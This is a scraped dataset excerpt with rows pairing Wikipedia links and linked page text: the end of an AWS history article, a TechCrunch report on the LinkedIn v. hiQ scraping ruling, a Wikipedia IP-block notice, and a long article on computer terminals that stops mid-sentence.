Amazon's North American retail business for the first time. 72 Jassy was thereafter promoted to CEO of the division. 73 Around the same time, Amazon experienced a 42% rise in stock value as a result of increased earnings, of which AWS contributed 56% to corporate profits. 74 AWS had $17.46 billion in annual revenue in 2017. 75 By the end of 2020, the number had grown to $46 billion. 76 Reflecting the success of AWS, Jassy's annual compensation in 2017 hit nearly $36 million. 77 In January 2018, Amazon launched an autoscaling service on AWS. 78 79 In November 2018, AWS announced customized ARM cores for use in its servers. 80 Also in November 2018, AWS is developing ground stations to communicate with customers' satellites. 81 In 2019, AWS reported 37% yearly growth and accounted for 12% of Amazon's revenue (up from 11% in 2018). 82 In April 2021, AWS reported 32% yearly growth and accounted for 32% of $41.8 billion cloud market in Q1 2021. 83 In January 2022, AWS joined the MACH Alliance, a non-profit enterprise technology advocacy group. 84 In June 2022, it was reported that in 2019 Capital One had not secured their AWS resources properly, and was subject to a data breach by a former AWS employee. The employee was convicted of hacking into the company's cloud servers to steal customer data and use computer power to mine cryptocurrency. The ex-employee was able to download the personal information of more than 100 million Capital One customers. 85 In June 2022, AWS announced they had launched the AWS Snowcone, a small computing device, to the International Space Station on the Axiom Mission 1. 86 In September 2023, AWS announced it would become AI startup Anthropic's primary cloud provider. Amazon has committed to investing up to $4 billion in Anthropic and will have a minority ownership position in the company. 87 AWS also announced the GA of Amazon Bedrock, a fully managed service that makes foundation models (FMs) from leading AI companies available through a single application programming interface (API) 88 In April 2024, AWS announced a new service called Deadline Cloud, which lets customers set up, deploy and scale up graphics and visual effects rendering pipelines on AWS cloud infrastructure. 89 Notable customers include NASA, 90 and the Obama presidential campaign of 2012. 91 In October 2013, AWS was awarded a $600M contract with the CIA. 92 In 2019, it was reported that more than 80% of Germany's listed DAX companies use AWS. 93 In August 2019, the U.S. Navy said it moved 72,000 users from six commands to an AWS cloud system as a first step toward pushing all of its data and analytics onto the cloud. 94 In 2021, DISH Network announced it will develop and launch its 5G network on AWS. 95 In October 2021, it was reported that spy agencies and government departments in the UK such as GCHQ, MI5, MI6, and the Ministry of Defence, have contracted AWS to host their classified materials. 96 Multiple financial services firms have shifted to AWS in some form. 97 98 99 As of March 2024, update AWS has distinct operations in 33 geographical "regions": 8 eight in North America, one in South America, eight in Europe, three in the Middle East, one in Africa, and twelve in Asia Pacific. Most AWS regions are enabled by default for AWS accounts. Regions introduced after 20 March 2019 are considered to be opt-in regions, requiring a user to explicitly enable them in order for the region to be usable in the account. For opt-in regions, Identity and Access Management (IAM) resources such as users and roles are only propagated to the regions that are enabled. 110 Each region is wholly contained within a single country and all of its data and services stay within the designated region. 7 Each region has multiple "Availability Zones", 111 which consist of one or more discrete data centers, each with redundant power, networking, and connectivity, housed in separate facilities. Availability Zones do not automatically provide additional scalability or redundancy within a region, since they are intentionally isolated from each other to prevent outages from spreading between zones. Several services can operate across Availability Zones (e.g., S3, DynamoDB) while others can be configured to replicate across zones to spread demand and avoid downtime from failures. As of December 2014, update Amazon Web Services operated an estimated 1.4 million servers across 11 regions and 28 availability zones. 112 The global network of AWS Edge locations consists of over 300 points of presence worldwide, including locations in North America, Europe, Asia, Australia, Africa, and South America. 113 As of March 2024, update AWS has announced the planned launch of six additional regions in Malaysia, Mexico, New Zealand, Thailand, Saudi Arabia, and the European Union. 8 In mid March 2023, Amazon Web Services signed a cooperation agreement with the New Zealand Government to build large data centers in New Zealand. 114 In 2014, AWS claimed its aim was to achieve 100% renewable energy usage in the future. 115 In the United States, AWS's partnerships with renewable energy providers include Community Energy of Virginia, to support the US East region; 116 Pattern Development, in January 2015, to construct and operate Amazon Wind Farm Fowler Ridge; 117 Iberdrola Renewables, LLC, in July 2015, to construct and operate Amazon Wind Farm US East; EDP Renewables North America, in November 2015, to construct and operate Amazon Wind Farm US Central; 118 and Tesla Motors, to apply battery storage technology to address power needs in the US West (Northern California) region. 116 AWS also has "pop-up lofts" in different locations around the world. 119 These market AWS to entrepreneurs and startups in different tech industries in a physical location. Visitors can work or relax inside the loft, or learn more about what they can do with AWS. In June 2014, AWS opened their first temporary pop-up loft in San Francisco. 120 In May 2015 they expanded to New York City, 121 122 and in September 2015 expanded to Berlin. 123 AWS opened its fourth location, in Tel Aviv from March 1, 2016, to March 22, 2016. 124 A pop-up loft was open in London from September 10 to October 29, 2015. 125 The pop-up lofts in New York 126 and San Francisco 127 are indefinitely closed due to the COVID 19 pandemic while Tokyo has remained open in a limited capacity. 128 In 2017, AWS launched AWS re Start in the United Kingdom to help young adults and military veterans retrain in technology-related skills. In partnership with the Prince's Trust and the Ministry of Defence (MoD), AWS will help to provide re-training opportunities for young people from disadvantaged backgrounds and former military personnel. AWS is working alongside a number of partner companies including Cloudreach, Sage Group, EDF Energy, and Tesco Bank. 129 In April 2022, AWS announced the organization has committed more than $30 million over three years to early-stage start-ups led by Black, Latino, LGBTQIA , and Women founders as part of its AWS impact Accelerator. The Initiative offers qualifying start-ups up to $225,000 in cash, credits, extensive training, mentoring, technical guidance and includes up to $100,000 in AWS service credits. 130 In 2016, Greenpeace assessed major tech companies—including cloud services providers like AWS, Microsoft, Oracle, Google, IBM, Salesforce and Rackspace—based on their level of "clean energy" usage. Greenpeace evaluated companies on their mix of renewable-energy sources; transparency; renewable-energy commitment and policies; energy efficiency and greenhouse-gas mitigation; renewable-energy procurement; and advocacy. The group gave AWS an overall "C" grade. Greenpeace credited AWS for its advances toward greener computing in recent years and its plans to launch multiple wind and solar farms across the United States. The organization stated that Amazon is opaque about its carbon footprint. 131 In January 2021, AWS joined an industry pledge to achieve climate neutrality of data centers by 2030, the Climate Neutral Data Centre Pact. 132 As of 2023, Amazon as a whole is the largest corporate purchaser of renewable energy in the world, a position it has held since 2020, and has a global portfolio of over 20 GW of renewable energy capacity. 133 In 2022, 90% of all Amazon operations, including data centers, were powered by renewables. 134 US Department of Homeland Security has employed the software ATLAS, which runs on Amazon Cloud. It scanned more than 16.5 million records of naturalized Americans and flagged approximately 124,000 of them for manual analysis and review by USCIS officers regarding denaturalization. 135 136 Some of the scanned data came from the Terrorist Screening Database and the National Crime Information Center. The algorithm and the criteria for the algorithm were secret. Amazon faced protests from its own employees and activists for the anti-migrant collaboration with authorities. 137 The contract for Project Nimbus drew rebuke and condemnation from the companies' shareholders as well as their employees, over concerns that the project would lead to abuses of Palestinians' human rights in the context of the ongoing occupation and the Israeli Palestinian conflict. 138 139 140 141 Specifically, they voice concern over how the technology will enable further surveillance of Palestinians and unlawful data collection on them as well as facilitate the expansion of Israel's illegal settlements on Palestinian land. 140 A government procurement document featuring 'obligatory customers' of Nimbus, including "two of Israel’s leading state-owned weapons manufacturers" Israel Aerospace Industries and Rafael Advanced Defense Systems, was published in 2021 with periodic updates since (up to Oct 2023). 142 |
459 | https://en.wikipedia.org/wiki/Web_scraping | https://techcrunch.com/2022/04/18/web-scraping-legal-court/ | Comment Good news for archivists, academics, researchers and journalists: Scraping publicly accessible data is legal, according to a U.S. appeals court ruling. The landmark ruling by the U.S. Ninth Circuit of Appeals is the latest in a long-running legal battle brought by LinkedIn aimed at stopping a rival company from web scraping personal information from users’ public profiles. The case reached the U.S. Supreme Court last year but was sent back to the Ninth Circuit for the original appeals court to re-review the case. In its second ruling on Monday, the Ninth Circuit reaffirmed its original decision and found that scraping data that is publicly accessible on the internet is not a violation of the Computer Fraud and Abuse Act, or CFAA, which governs what constitutes computer hacking under U.S. law. The Ninth Circuit’s decision is a major win for archivists, academics, researchers and journalists who use tools to mass collect, or scrape, information that is publicly accessible on the internet. Without a ruling in place, long-running projects to archive websites no longer online and using publicly accessible data for academic and research studies have been left in legal limbo. But there have been egregious cases of web scraping that have sparked privacy and security concerns. Facial recognition startup Clearview AI claims to have scraped billions of social media profile photos, prompting several tech giants to file lawsuits against the startup. Several companies, including Facebook, Instagram, Parler, Venmo and Clubhouse have all had users’ data scraped over the years. The case before the Ninth Circuit was originally brought by LinkedIn against Hiq Labs, a company that uses public data to analyze employee attrition. LinkedIn said Hiq’s mass web scraping of LinkedIn user profiles was against its terms of service, amounted to hacking and was therefore a violation of the CFAA. LinkedIn first lost the case against Hiq in 2019 after the Ninth Circuit found that the CFAA does not bar anyone from scraping data that’s publicly accessible. On its second pass of the case, the Ninth Circuit said it relied on a Supreme Court decision last June, during which the U.S. top court took its first look at the decades-old CFAA. In its ruling, the Supreme Court narrowed what constitutes a violation of the CFAA as those who gain unauthorized access to a computer system — rather than a broader interpretation of exceeding existing authorization, which the court argued could have attached criminal penalties to “a breathtaking amount of commonplace computer activity. Using a “gate-up, gate-down” analogy, the Supreme Court said that when a computer or website’s gates are up — and therefore information is publicly accessible — no authorization is required. The Ninth Circuit, in referencing the Supreme Court’s “gate-up, gate-down” analogy, ruled that “the concept of without authorization’ does not apply to public websites. “We’re disappointed in the court’s decision. This is a preliminary ruling and the case is far from over, said LinkedIn spokesperson Greg Snapper in a statement. “We will continue to fight to protect our members’ ability to control the information they make available on LinkedIn. When your data is taken without permission and used in ways you haven’t agreed to, that’s not okay. On LinkedIn, our members trust us with their information, which is why we prohibit unauthorized scraping on our platform. Supreme Court limits US hacking law in landmark CFAA ruling Every weekday and Sunday, you can get the best of TechCrunch’s coverage. Startups are the core of TechCrunch, so get our best coverage delivered weekly. The latest Fintech news and analysis, delivered every Tuesday. TechCrunch Mobility is your destination for transportation news and insight. By submitting your email, you agree to our Terms and Privacy Notice. Brands can use Keychain to look up different products and see who actually manufactures them. In this post, we explain the many Microsoft Copilots available and what they do, and highlight the key differences between each. A hack on UnitedHealth-owned tech giant Change Healthcare likely stands as one of the biggest data breaches of U.S. medical data in history. Gogoro has deferred its India plans over delay in government incentives, but the Taiwanese company has partnered with Rapido for a bike-taxi pilot. On Friday, the venture firm Andreessen Horowitz tweeted out a link to its guide on how to “build your social media presence” which features advice for founders. OpenAI has banned a cluster of ChatGPT accounts linked to an Iranian influence operation that was generating content about the U.S. presidential election, according to a blog post on Friday.… Apple is reportedly shifting into the world of home robots after the wheels came off its electric car. According to a new report from Bloomberg, a team of several hundred… Welcome to Startups Weekly — your weekly recap of everything you can’t miss from the world of startups. I’m Anna Heim from TechCrunch’s international team, and I’ll be writing this newsletter… MIT this week showcased tiny batteries designed specifically for the purpose of power these systems to execute varied tasks. Rimac revealed Friday during The Quail, a Motorsports Gathering at Monterey Car Week the Nevera R, an all-electric hypercar that’s meant to push the performance bounds of its predecessor. While the ethics of AI-generated porn are still under debate, using the technology to create nonconsensual sexual imagery of people is, I think we can all agree, reprehensible. One such… Almost two weeks ago, TechCrunch reported that African e-commerce giant Jumia was planning to sell 20 million American depositary shares (ADSs) and raise more than $100 million, given its share… We’re entering the final week of discounted rates for TechCrunch Disrupt 2024. Save up to $600 on select individual ticket types until August 23. Join a dynamic crowd of over… Epic Games, the maker of Fortnite, announced on Friday that it has officially launched its rival iOS app store in the European Union. The Epic Games Store is also launching… After bringing AI overviews to the U.S., Google is expanding the AI-powered search summaries to six more countries: India, Brazil, Japan, the U.K., Indonesia and Mexico. These markets will also… The Commission is seeking more information from Meta following its decision to deprecate its CrowdTangle transparency tool. The latest EU request for information (RFI) on Meta has been made under… In the last few months, Twitter alternatives — new and old — have found an audience willing to try out a new text-based social network. Mastodon, Bluesky, Spill and T2… Revolut has confirmed a new valuation of $45 billion via a secondary market share sale, shortly after the U.K. based neobank secured its own banking license in the U.K. and Mexico.… A social media spat between billionaire tech investors is raising questions about the journalistic independence of three-year-old news outfit SF Standard, after a reporter representing the outlet reached out to… SB 1047 has drawn the ire of Silicon Valley players large and small, including venture capitalists, big tech trade groups, researchers and startup founders. California’s bill to prevent AI disasters, SB 1047, has faced significant opposition from many parties in Silicon Valley. Today, California lawmakers bent slightly to that pressure, adding in several amendments… Journalists, researchers and politicians are mourning Meta’s shutdown of CrowdTangle, which they used to track the spread of disinformation on Facebook and Instagram. In CrowdTangle’s place, Meta is offering its… The Rivian camp kitchen attracted buzz from almost the moment it appeared as a prototype in 2019 at Overland Expo West. Despite interest in the accessory, Rivian never actually sold… Featured Article The tech layoff wave is still going strong in 2024. Following significant workforce reductions in 2022 and 2023, this year has already seen 60,000 job cuts across 254 companies, according to independent layoffs tracker Layoffs.fyi. Companies like Tesla, Amazon, Google, TikTok, Snap and Microsoft have conducted sizable layoffs in the… The layoffs occurred in waves over the past two years, and as recently as the last few weeks. A pair of Rocket Lab-made spacecraft are about to embark on a two-step journey. The first step is the 55 hour, 2,500 mile stretch from California to the launch site at Cape… At a price of $111 for the Sat75 X board, this is a fun and easy way to get into building a custom mechanical keyboard without breaking the bank. HighPost Capital, a private equity firm run by Mark Bezos, Jeff Bezos’ younger brother, and PE veteran David Moross, has launched a new venture capital arm. California residents will soon be able to store their driver’s license or state ID in their Apple Wallet or Google Wallet apps, as the state’s government announced Thursday that support… Despite the influx of U.K. users to Bluesky, other new data indicates that it’s still Meta’s Threads, not Bluesky, that’s better poised to challenge X. Powered by WordPress VIP |
460 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit§ion=5 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Data scraping. |
461 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Dumb_terminal | A computer terminal is an electronic or electromechanical hardware device that can be used for entering data into, and transcribing 1 data from, a computer or a computing system. 2 Most early computers only had a front panel to input or display bits and had to be connected to a terminal to print or input text through a keyboard. Teleprinters were used as early-day hard-copy terminals 3 4 and predated the use of a computer screen by decades. The computer would typically transmit a line of data which would be printed on paper, and accept a line of data from a keyboard over a serial or other interface. Starting in the mid 1970s with microcomputers such as the Sphere 1, Sol 20, and Apple I, display circuitry and keyboards began to be integrated into personal and workstation computer systems, with the computer handling character generation and outputting to a CRT display such as a computer monitor or, sometimes, a consumer TV, but most larger computers continued to require terminals. Early terminals were inexpensive devices but very slow compared to punched cards or paper tape for input; with the advent of time-sharing systems, terminals slowly pushed these older forms of interaction from the industry. Related development were the improvement of terminal technology and the introduction of inexpensive video displays. Early Teletypes only printed out with a communications speed of only 75 baud or 10 5 bit characters per second, and by the 1970s speeds of video terminals had improved to 2400 or 9600 2400 bit s. Similarly, the speed of remote batch terminals had improved to 4800 bit s at the beginning of the decade and 19.6 kbps by the end of the decade, with higher speeds possible on more expensive terminals. The function of a terminal is typically confined to transcription and input of data; a device with significant local, programmable data-processing capability may be called a "smart terminal" or fat client. A terminal that depends on the host computer for its processing power is called a "dumb terminal" 5 or a thin client. 6 7 In the era of serial (RS 232) terminals there was a conflicting usage of the term "smart terminal" as a dumb terminal with no user-accessible local computing power but a particularly rich set of control codes for manipulating the display; this conflict was not resolved before hardware serial terminals became obsolete. A personal computer can run terminal emulator software that replicates functions of a real-world terminal, sometimes allowing concurrent use of local programs and access to a distant terminal host system, either over a direct serial connection or over a network using, e.g., SSH. Today few if any dedicated computer terminals are being manufactured, as time sharing on large computers has been replaced by personal computers, handheld devices and workstations with graphical user interfaces. User interactions with servers use either software such as Web browsers, or terminal emulators, with connections over high-speed networks. The console of Konrad Zuse's Z3 had a keyboard in 1941, as did the Z4 in 1942 1945. However, these consoles could only be used to enter numeric inputs and were thus analogous to those of calculating machines; programs, commands, and other data were entered via paper tape. Both machines had a row of display lamps for results. In 1956, the Whirlwind Mark I computer became the first computer equipped with a keyboard-printer combination with which to support direct input 4 of data and commands and output of results. That device was a Friden Flexowriter, which would continue to serve this purpose on many other early computers well into the 1960s. Early user terminals connected to computers were, like the Flexowriter, electromechanical teleprinters teletypewriters (TeleTYpewriter, TTY), such as the Teletype Model 33, originally used for telegraphy; early Teletypes were typically configured as Keyboard Send-Receive (KSR) or Automatic Send-Receive (ASR). Some terminals, such as the ASR Teletype models, included a paper tape reader and punch which could record output such as a program listing. The data on the tape could be re-entered into the computer using the tape reader on the teletype, or printed to paper. Teletypes used the current loop interface that was already used in telegraphy. A less expensive Read Only (RO) configuration was available for the Teletype. Custom-designs keyboard printer terminals that came later included the IBM 2741 (1965) 8 and the DECwriter (1970). 9 Respective top speeds of teletypes, IBM 2741 and the LA30 (an early DECwriter) were 10, 15 and 30 characters per second. Although at that time "paper was king" 9 10 the speed of interaction was relatively limited. The DECwriter was the last major printing-terminal product. It faded away after 1980 under pressure from video display units (VDUs), with the last revision (the DECwriter IV of 1982) abandoning the classic teletypewriter form for one more resembling a desktop printer. A video display unit (VDU) displays information on a screen rather than printing text to paper and typically uses a cathode-ray tube (CRT). VDUs in the 1950s were typically designed for displaying graphical data rather than text and were used in, e.g., experimental computers at institutions like MIT; computers used in academia, government and business, sold under brand names like DEC, ERA, IBM and UNIVAC; military computers supporting specific defence applications such as ballistic missile warning systems and radar air defence coordination systems like BUIC and SAGE. Two early landmarks in the development of the VDU were the Univac Uniscope 11 12 13 and the IBM 2260, 14 both in 1964. These were block-mode terminals designed to display a page at a time, using proprietary protocols; in contrast to character-mode devices, they enter data from the keyboard into a display buffer rather than transmitting them immediately. In contrast to later character-mode devices, the Uniscope used synchronous serial communication over an EIA RS 232 interface to communicate between the multiplexer and the host, while the 2260 used either a channel connection or asynchronous serial communication between the 2848 and the host. The 2265, related to the 2260, also used asynchronous serial communication. The Datapoint 3300 from Computer Terminal Corporation, announced in 1967 and shipped in 1969, was a character-mode device that emulated a Model 33 Teletype. This reflects the fact that early character-mode terminals were often deployed to replace teletype machines as a way to reduce operating costs. The next generation of VDUs went beyond teletype emulation with an addressable cursor that gave them the ability to paint two-dimensional displays on the screen. Very early VDUs with cursor addressibility included the VT05 and the Hazeltine 2000 operating in character mode, both from 1970. Despite this capability, early devices of this type were often called "Glass TTYs". 15 Later, the term "glass TTY" tended to be restrospectively narrowed to devices without full cursor addressibility. The classic era of the VDU began in the early 1970s and was closely intertwined with the rise of time sharing computers. Important early products were the ADM 3A, VT52, and VT100. These devices used no complicated CPU, instead relying on individual logic gates, LSI chips, or microprocessors such as the Intel 8080. This made them inexpensive and they quickly became extremely popular input-output devices on many types of computer system, often replacing earlier and more expensive printing terminals. After 1970 several suppliers gravitated to a set of common standards: The experimental era of serial VDUs culminated with the VT100 in 1978. By the early 1980s, there were dozens of manufacturers of terminals, including Lear-Siegler, ADDS, Data General, DEC, Hazeltine Corporation, Heath Zenith, Hewlett-Packard, IBM, TeleVideo, Volker-Craig, and Wyse, many of which had incompatible command sequences (although many used the early ADM 3 as a starting point). The great variations in the control codes between makers gave rise to software that identified and grouped terminal types so the system software would correctly display input forms using the appropriate control codes; In Unix-like systems the termcap or terminfo files, the stty utility, and the TERM environment variable would be used; in Data General's Business BASIC software, for example, at login-time a sequence of codes were sent to the terminal to try to read the cursor's position or the 25th line's contents using a sequence of different manufacturer's control code sequences, and the terminal-generated response would determine a single-digit number (such as 6 for Data General Dasher terminals, 4 for ADM 3A 5 11 12 terminals, 0 or 2 for TTYs with no special features) that would be available to programs to say which set of codes to use. The great majority of terminals were monochrome, manufacturers variously offering green, white or amber and sometimes blue screen phosphors. (Amber was claimed to reduce eye strain). Terminals with modest color capability were also available but not widely used; for example, a color version of the popular Wyse WY50, the WY350, offered 64 shades on each character cell. VDUs were eventually displaced from most applications by networked personal computers, at first slowly after 1985 and with increasing speed in the 1990s. However, they had a lasting influence on PCs. The keyboard layout of the VT220 terminal strongly influenced the Model M shipped on IBM PCs from 1985, and through it all later computer keyboards. Although flat-panel displays were available since the 1950s, cathode-ray tubes continued to dominate the market until the personal computer had made serious inroads into the display terminal market. By the time cathode-ray tubes on PCs were replaced by flatscreens after the year 2000, the hardware computer terminal was nearly obsolete. A character-oriented terminal is a type of computer terminal that communicates with its host one character at a time, as opposed to a block-oriented terminal that communicates in blocks of data. It is the most common type of data terminal, because it is easy to implement and program. Connection to the mainframe computer or terminal server is achieved via RS 232 serial links, Ethernet or other proprietary protocols. Character-oriented terminals can be "dumb" or "smart". Dumb terminals 5 are those that can interpret a limited number of control codes (CR, LF, etc.) but do not have the ability to process special escape sequences that perform functions such as clearing a line, clearing the screen, or controlling cursor position. In this context dumb terminals are sometimes dubbed glass Teletypes, for they essentially have the same limited functionality as does a mechanical Teletype. This type of dumb terminal is still supported on modern Unix-like systems by setting the environment variable TERM to dumb. Smart or intelligent terminals are those that also have the ability to process escape sequences, in particular the VT52, VT100 or ANSI escape sequences. A text terminal, or often just terminal (sometimes text console) is a serial computer interface for text entry and display. Information is presented as an array of pre-selected formed characters. When such devices use a video display such as a cathode-ray tube, they are called a "video display unit" or "visual display unit" (VDU) or "video display terminal" (VDT). The system console is often 16 a text terminal used to operate a computer. Modern computers have a built-in keyboard and display for the console. Some Unix-like operating systems such as Linux and FreeBSD have virtual consoles to provide several text terminals on a single computer. The fundamental type of application running on a text terminal is a command-line interpreter or shell, which prompts for commands from the user and executes each command after a press of Return. 17 This includes Unix shells and some interactive programming environments. In a shell, most of the commands are small applications themselves. Another important application type is that of the text editor. A text editor typically occupies the full area of display, displays one or more text documents, and allows the user to edit the documents. The text editor has, for many uses, been replaced by the word processor, which usually provides rich formatting features that the text editor lacks. The first word processors used text to communicate the structure of the document, but later word processors operate in a graphical environment and provide a WYSIWYG simulation of the formatted output. However, text editors are still used for documents containing markup such as DocBook or LaTeX. Programs such as Telix and Minicom control a modem and the local terminal to let the user interact with remote servers. On the Internet, telnet and ssh work similarly. In the simplest form, a text terminal is like a file. Writing to the file displays the text and reading from the file produces what the user enters. In Unix-like operating systems, there are several character special files that correspond to available text terminals. For other operations, there are special escape sequences, control characters and termios functions that a program can use, most easily via a library such as ncurses. For more complex operations, the programs can use terminal specific ioctl system calls. For an application, the simplest way to use a terminal is to simply write and read text strings to and from it sequentially. The output text is scrolled, so that only the last several lines (typically 24) are visible. Unix systems typically buffer the input text until the Enter key is pressed, so the application receives a ready string of text. In this mode, the application need not know much about the terminal. For many interactive applications this is not sufficient. One of the common enhancements is command-line editing (assisted with such libraries as readline); it also may give access to command history. This is very helpful for various interactive command-line interpreters. Even more advanced interactivity is provided with full-screen applications. Those applications completely control the screen layout; also they respond to key-pressing immediately. This mode is very useful for text editors, file managers and web browsers. In addition, such programs control the color and brightness of text on the screen, and decorate it with underline, blinking and special characters (e.g. box-drawing characters). To achieve all this, the application must deal not only with plain text strings, but also with control characters and escape sequences, which allow moving the cursor to an arbitrary position, clearing portions of the screen, changing colors and displaying special characters, and also responding to function keys. The great problem here is that there are many different terminals and terminal emulators, each with its own set of escape sequences. In order to overcome this, special libraries (such as curses) have been created, together with terminal description databases, such as Termcap and Terminfo. A block-oriented terminal or block mode terminal is a type of computer terminal that communicates with its host in blocks of data, as opposed to a character-oriented terminal that communicates with its host one character at a time. A block-oriented terminal may be card-oriented, display-oriented, keyboard-display, keyboard-printer, printer or some combination. The IBM 3270 is perhaps the most familiar implementation of a block-oriented display terminal, 18 but most mainframe computer manufacturers and several other companies produced them. The description below is in terms of the 3270, but similar considerations apply to other types. Block-oriented terminals typically incorporate a buffer which stores one screen or more of data, and also stores data attributes, not only indicating appearance (color, brightness, blinking, etc.) but also marking the data as being enterable by the terminal operator vs. protected against entry, as allowing the entry of only numeric information vs. allowing any characters, etc. In a typical application the host sends the terminal a preformatted panel containing both static data and fields into which data may be entered. The terminal operator keys data, such as updates in a database entry, into the appropriate fields. When entry is complete (or ENTER or PF key pressed on 3270s), a block of data, usually just the data entered by the operator (modified data), is sent to the host in one transmission. The 3270 terminal buffer (at the device) could be updated on a single character basis, if necessary, because of the existence of a "set buffer address order" (SBA), that usually preceded any data to be written overwritten within the buffer. A complete buffer could also be read or replaced using the READ BUFFER command or WRITE command (unformatted or formatted in the case of the 3270). Block-oriented terminals cause less system load on the host and less network traffic than character-oriented terminals. They also appear more responsive to the user, especially over slow connections, since editing within a field is done locally rather than depending on echoing from the host system. Early terminals had limited editing capabilities 3270 terminals, for example, only could check entries as valid numerics. 19 Subsequent "smart" or "intelligent" terminals incorporated microprocessors and supported more local processing. Programmers of block-oriented terminals often used the technique of storing context information for the transaction in progress on the screen, possibly in a hidden field, rather than depending on a running program to keep track of status. This was the precursor of the HTML technique of storing context in the URL as data to be passed as arguments to a CGI program. Unlike a character-oriented terminal, where typing a character into the last position of the screen usually causes the terminal to scroll down one line, entering data into the last screen position on a block-oriented terminal usually causes the cursor to wrap— move to the start of the first enterable field. Programmers might "protect" the last screen position to prevent inadvertent wrap. Likewise a protected field following an enterable field might lock the keyboard and sound an audible alarm if the operator attempted to enter more data into the field than allowed. A graphical terminal can display images as well as text. Graphical terminals 23 are divided into vector-mode terminals, and raster mode. A vector-mode display directly draws lines on the face of a cathode-ray tube under control of the host computer system. The lines are continuously formed, but since the speed of electronics is limited, the number of concurrent lines that can be displayed at one time is limited. Vector-mode displays were historically important but are no longer used. Practically all modern graphic displays are raster-mode, descended from the picture scanning techniques used for television, in which the visual elements are a rectangular array of pixels. Since the raster image is only perceptible to the human eye as a whole for a very short time, the raster must be refreshed many times per second to give the appearance of a persistent display. The electronic demands of refreshing display memory meant that graphic terminals were developed much later than text terminals, and initially cost much more. 24 25 Most terminals today when? are graphical; that is, they can show images on the screen. The modern term for graphical terminal is "thin client". citation needed A thin client typically uses a protocol like X11 for Unix terminals, or RDP for Microsoft Windows. The bandwidth needed depends on the protocol used, the resolution, and the color depth. Modern graphic terminals allow display of images in color, and of text in varying sizes, colors, and fonts (type faces). clarification needed In the early 1990s, an industry consortium attempted to define a standard, AlphaWindows, that would allow a single CRT screen to implement multiple windows, each of which was to behave as a distinct terminal. Unfortunately, like I2O, this suffered from being run as a closed standard: non-members were unable to obtain even minimal information and there was no realistic way a small company or independent developer could join the consortium. citation needed An intelligent terminal 26 does its own processing, usually implying a microprocessor is built in, but not all terminals with microprocessors did any real processing of input: the main computer to which it was attached would have to respond quickly to each keystroke. The term "intelligent" in this context dates from 1969. 27 Notable examples include the IBM 2250, predecessor to the IBM 3250 and IBM 5080, and IBM 2260, 28 predecessor to the IBM 3270, introduced with System 360 in 1964. Most terminals were connected to minicomputers or mainframe computers and often had a green or amber screen. Typically terminals communicate with the computer via a serial port via a null modem cable, often using an EIA RS 232 or RS 422 or RS 423 or a current loop serial interface. IBM systems typically communicated over a Bus and Tag channel, a coaxial cable using a proprietary protocol, a communications link using Binary Synchronous Communications or IBM's SNA protocol, but for many DEC, Data General and NCR (and so on) computers there were many visual display suppliers competing against the computer manufacturer for terminals to expand the systems. In fact, the instruction design for the Intel 8008 was originally conceived at Computer Terminal Corporation as the processor for the Datapoint 2200. From the introduction of the IBM 3270, and the DEC VT100 (1978), the user and programmer could notice significant advantages in VDU technology improvements, yet not all programmers used the features of the new terminals (backward compatibility in the VT100 and later TeleVideo terminals, for example, with "dumb terminals" allowed programmers to continue to use older software). Some dumb terminals had been able to respond to a few escape sequences without needing microprocessors: they used multiple printed circuit boards with many integrated circuits; the single factor that classed a terminal as "intelligent" was its ability to process user-input within the terminal—not interrupting the main computer at each keystroke—and send a block of data at a time (for example: when the user has finished a whole field or form). Most terminals in the early 1980s, such as ADM 3A, TVI912, Data General D2, DEC VT52, despite the introduction of ANSI terminals in 1978, were essentially "dumb" terminals, although some of them (such as the later ADM and TVI models) did have a primitive block-send capability. Common early uses of local processing power included features that had little to do with off-loading data processing from the host computer but added useful features such as printing to a local printer, buffered serial data transmission and serial handshaking (to accommodate higher serial transfer speeds), and more sophisticated character attributes for the display, as well as the ability to switch emulation modes to mimic competitor's models, that became increasingly important selling features during the 1980s especially, when buyers could mix and match different suppliers' equipment to a greater extent than before. The advance in microprocessors and lower memory costs made it possible for the terminal to handle editing operations such as inserting characters within a field that may have previously required a full screen-full of characters to be re-sent from the computer, possibly over a slow modem line. Around the mid 1980s most intelligent terminals, costing less than most dumb terminals would have a few years earlier, could provide enough user-friendly local editing of data and send the completed form to the main computer. Providing even more processing possibilities, workstations like the TeleVideo TS 800 could run CP M 86, blurring the distinction between terminal and Personal Computer. Another of the motivations for development of the microprocessor was to simplify and reduce the electronics required in a terminal. That also made it practicable to load several "personalities" into a single terminal, so a Qume QVT 102 could emulate many popular terminals of the day, and so be sold into organizations that did not wish to make any software changes. Frequently emulated terminal types included: The ANSI X3.64 escape code standard produced uniformity to some extent, but significant differences remained. For example, the VT100, Heathkit H19 in ANSI mode, Televideo 970, Data General D460, and Qume QVT 108 terminals all followed the ANSI standard, yet differences might exist in 